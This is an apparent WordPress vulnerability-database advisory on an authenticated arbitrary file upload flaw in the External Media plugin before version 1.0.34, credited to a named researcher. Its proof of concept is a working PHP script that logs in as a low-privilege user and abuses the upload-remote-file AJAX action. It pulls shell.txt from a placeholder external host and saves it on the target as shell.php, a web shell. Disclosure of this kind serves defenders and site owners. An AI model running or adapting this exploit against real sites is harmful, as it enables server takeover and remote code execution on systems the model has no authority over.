WordPress Plugin Vulnerabilities
External Media < 1.0.34 - Authenticated Arbitrary File Upload
Description
The wp_ajax_upload-remote-file AJAX action of the plugin was vulnerable to arbitrary file uploads via any authenticated users.
Proof of Concept
<?php // Settings $wp_url = $argv[1]; $wp_user = $argv[2]; $wp_pass = $argv[3]; // Log in as subscriber $ch = curl_init(); $cookiejar = tempnam(sys_get_temp_dir(), 'cookiejar-'); curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-login.php'); curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar); curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, [ 'log' => $wp_user, 'pwd' => $wp_pass, 'rememberme' => 'forever', 'wp-submit' => 'Log+In', ]); $output = curl_exec($ch); curl_close($ch); // Upload File $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-admin/admin-ajax.php'); curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar); curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, [ 'url' => 'https://EXTERNALSITEHOSTINGFILE/shell.txt', 'plugin' => 'ExternalLink', 'filename' => 'shell.php', 'caption' => '', 'referer' => '', 'action' => 'upload-remote-file' ]); $output = curl_exec($ch); curl_close($ch); echo $output; ?>
Affects Plugins
References
Miscellaneous
Original Researcher
Chloe Chamberland
Submitter
Chloe Chamberland
Submitter website
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-05-13 (about 3 years ago)
Added
2021-05-13 (about 3 years ago)
Last Updated
2021-05-14 (about 3 years ago)